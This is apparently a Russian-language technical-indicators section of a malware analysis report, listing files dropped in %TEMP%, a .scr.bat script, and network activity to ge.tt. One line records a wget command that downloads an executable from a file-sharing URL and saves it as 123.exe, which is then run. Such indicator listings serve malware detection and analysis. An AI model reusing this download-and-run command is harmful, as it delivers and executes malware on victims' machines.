Техническая информация
- '%TEMP%\123.exe'
- '%TEMP%\C947.tmp\wget.exe' http://ge.tt/api/1/files/2H8flg32/0/blob?do###### -O %TEMP%\123.exe
- '%TEMP%\123.exe' (загружен из сети Интернет)
- %TEMP%\123.exe
- %TEMP%\C947.tmp\wget.exe
- %TEMP%\C947.tmp\2Y6Ei5j4.scr.bat
- %TEMP%\C947.tmp\2Y6Ei5j4.scr.bat
- 'ge.tt':80
- ge.tt/api/1/files/2H8flg32/0/blob?do######
- DNS ASK ge.tt